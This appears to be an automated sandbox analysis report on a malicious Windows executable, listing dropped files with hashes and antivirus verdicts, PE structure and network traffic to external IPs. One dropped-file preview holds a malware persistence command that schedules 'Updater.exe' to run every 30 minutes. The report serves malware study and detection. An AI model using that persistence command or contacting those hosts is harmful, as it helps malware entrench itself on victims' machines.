                                                                                          Entropy (8bit):6.545978188908966
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                          MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                          SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                          SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                          SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                                           Preview:
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):2123218
                                                                                          Entropy (8bit):7.9788749010606965
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:ChrF2z0X1W34qvuyXPHcqaGqW9gwLgMyu5noEiyIJAuw:ChFdFWINS/NF9gpMR5oEfF
                                                                                          MD5:28B72E7425D6D224C060D3CF439C668C
                                                                                          SHA1:A0A14C90E32E1FFD82558F044C351AD785E4DCD8
                                                                                          SHA-256:460BA492FBC3163B80BC40813D840E50FEB84166DB7A300392669AFD21132D98
                                                                                          SHA-512:3E0696B4135F3702DA054B80D98A8485FB7F3002C4148A327BC790B0D33C62D442C01890CC047AF19A17A149C8C8EB84777C4FF313C95EC6AF64A8BF0B2D54B6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                                           Preview:
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):25600
                                                                                          Entropy (8bit):5.391050633650523
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
                                                                                          MD5:40D7ECA32B2F4D29DB98715DD45BFAC5
                                                                                          SHA1:124DF3F617F562E46095776454E1C0C7BB791CC7
                                                                                          SHA-256:85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
                                                                                          SHA-512:5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                           Preview:
                                                                                          Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):127
                                                                                          Entropy (8bit):4.777249987001707
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuqLTVSRE2J5xAIEyrKBySKFS3:Ogas7SXEFAuqLTwi23faKS3
                                                                                          MD5:CA7ADC94E6F7EAD9381DF2DF27538858
                                                                                          SHA1:33BBC2D0E16C527A68DC164E276DDC895375A3F8
                                                                                          SHA-256:0547E622E5E458C83CBAD46059E6469C1ACD5B46B04A5F88F0AE45C703F0D44A
                                                                                          SHA-512:CC703535CD57156F9EA3E8D8E231B6F13276B99F9686ECC3FA6F70149A3F496FDF97F92C93CF01E1777A4CBB17CF5F59FA9F7B69CCC003FB2C79C9749B28E99D
                                                                                          Malicious:false
                                                                                          Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..
                                                                                          Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):6291456
                                                                                          Entropy (8bit):5.253921897989971
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:KV5tI95VcEDi0v3lchlh6lRdKNhFk15N:KV5tI95Vr3lchlh6lRdKNhFk15N
                                                                                          MD5:DBE39743BD4872D4FD95A7BC82931EF3
                                                                                          SHA1:15F4C4E9BB4175AA507A475F926492E9D97775EC
                                                                                          SHA-256:17A50F94CA257C364B1C55EA7E62F8EFEDED12704F1AD4A6B71F909B90C6B340
                                                                                          SHA-512:73336EF4B94985D34FBA6187D81E8707F7BFA5BCF491FF49859AAE390E29DAF6B6EAEDCC974DFC714F66FD7604309779C8B258DAD60143E7581525C3C6F6442D
                                                                                          Malicious:false
                                                                                          Preview:.2023-10-03 09:57:33, Info CBS Starting TiWorker initialization...2023-10-03 09:57:33, Info CBS Lock: New lock added: TiWorkerClassFactory, level: 30, total lock:2..2023-10-03 09:57:33, Info CBS Ending TiWorker initialization...2023-10-03 09:57:33, Info CBS Starting the TiWorker main loop...2023-10-03 09:57:33, Info CBS TiWorker starts successfully...2023-10-03 09:57:33, Info CBS Lock: New lock added: CCbsWorker, level: 5, total lock:3..2023-10-03 09:57:33, Info CBS Universal Time is: 2023-10-03 08:57:33.888..2023-10-03 09:57:33, Info CBS Loaded Servicing Stack v10.0.19041.1940 with Core: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1940_none_7dd80d767cb5c7b0\cbscore.dll..2023-10-03 09:57:33, Info CBS Build: 19041.1.amd64fre.vb_release.191206-1406..2023-10-03 09:57:33
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2224
                                                                                          Entropy (8bit):5.354902188542171
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:CWSU4xymI4RfoUeW+gZ9tK8NPdMs7u1iMugeC/ZaOUyu0lhV:CLHxvIIwLgZ2KlDOugg01
                                                                                          MD5:6BF5249E7EED52BA8B9AD9804C79C0BF
                                                                                          SHA1:E6DC63E4AD576367367B2656A2C0CBAB7185B0A2
                                                                                          SHA-256:8AC1B3611A35F9365DD66AD4C89E1D54DBCD8587CF1DCCAAD9A697973DE378A9
                                                                                          SHA-512:0704A28140E1F8005BE21D999DFC3E262CA3D3BDB1EDB171B0D830E8B4DE4262D67B74BCBF90E066340EA70C10A4CBB52F8648675F26B8D78AC13DEE7DF0139A
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):14544
                                                                                          Entropy (8bit):6.2660301556221185
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.9258891229768595
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:25C1.exe
                                                                                          File size:9'104'384 bytes
                                                                                          MD5:ceae65ee17ff158877706edfe2171501
                                                                                          SHA1:b1f807080da9c25393c85f5d57105090f5629500
                                                                                          SHA256:0dac8a3fe3c63611b49db21b2756b781cc4c9117c64007e0c23e6d3e7ca9ee49
                                                                                          SHA512:5214febfab691b53ca132e75e217e82a77e438250695d521dbf6bc1770d828f2e79a0070fd746a73e29acc11bf9a62ceafb1cf85547c7c0178d49a740ff9ae7b
                                                                                          SSDEEP:196608:drdPa3Pl8j7Ke1k6N25U0agbrT6NZ+t0ZGhsYN6mQwclTm2:d5P08KeDQtSb+t0ZEJQwcTm
                                                                                          TLSH:2596236E1F9B9523FD78CFBD1711722296078EBA0841F84493E1941F6932482F92BF76
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................. ... ....@.. .......................`............@................................
                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0xcb00ae
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x65BD14A7 [Fri Feb 2 16:13:27 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x8b0060        | 0x4b         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x8b2000        | 0x540        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x8b4000        | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0x8ae0b4     | 0x8ae200 | 361d214ece51eda33266d8785c0b3b3e | unknown  | unknown            | unknown   | unknown             | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0x8b2000        | 0x540        | 0x600    | f5e25887af43c059ebd9f7ba08f497e8 | False    | 0.3971354166666667 | data      | 3.973253450395114   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8b4000        | 0xc          | 0x200    | 883c163f1362bb303bfd60206e080e28 | False    | 0.044921875        | data      | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        | RVA      | Size  | Type                                                                              | Language | Country | ZLIB Complexity
RT_VERSION  | 0x8b20a0 | 0x2ac | data                                                                              |          |         | 0.44590643274853803
RT_MANIFEST | 0x8b2350 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |          |         | 0.5469387755102041
DLL         | Import
mscoree.dll | _CorExeMain
Timestamp                       | Protocol | SID     | Signature                                                   | Source Port | Dest Port | Source IP   | Dest IP
2024-07-24T14:31:33.322221+0200 | TCP      | 2856233 | ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)   | 49706       | 80        | 192.168.2.9 | 185.172.128.90
Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Jul 24, 2024 14:31:11.853318930 CEST | 49706 | 80    | 192.168.2.9     | 185.172.128.90
Jul 24, 2024 14:31:11.858354092 CEST | 80    | 49706 | 185.172.128.90  | 192.168.2.9
Jul 24, 2024 14:31:11.860651016 CEST | 49706 | 80    | 192.168.2.9     | 185.172.128.90
Jul 24, 2024 14:31:11.860862970 CEST | 49706 | 80    | 192.168.2.9     | 185.172.128.90
Jul 24, 2024 14:31:11.865684986 CEST | 80    | 49706 | 185.172.128.90  | 192.168.2.9
Jul 24, 2024 14:31:21.262495995 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:21.267956972 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:21.268043995 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:21.268420935 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:21.275573015 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:21.909861088 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:21.909990072 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:21.910068035 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:21.910902977 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:21.916188955 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:22.088861942 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:22.223205090 CEST | 14433 | 49707 | 51.195.138.197  | 192.168.2.9
Jul 24, 2024 14:31:22.223278046 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:22.652049065 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:22.652086973 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:22.652229071 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:22.664132118 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:22.664166927 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.277764082 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.279983044 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.280004025 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.282068968 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.282162905 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.284514904 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.284607887 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.284914970 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.284924030 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.387922049 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.610054970 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.610296011 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
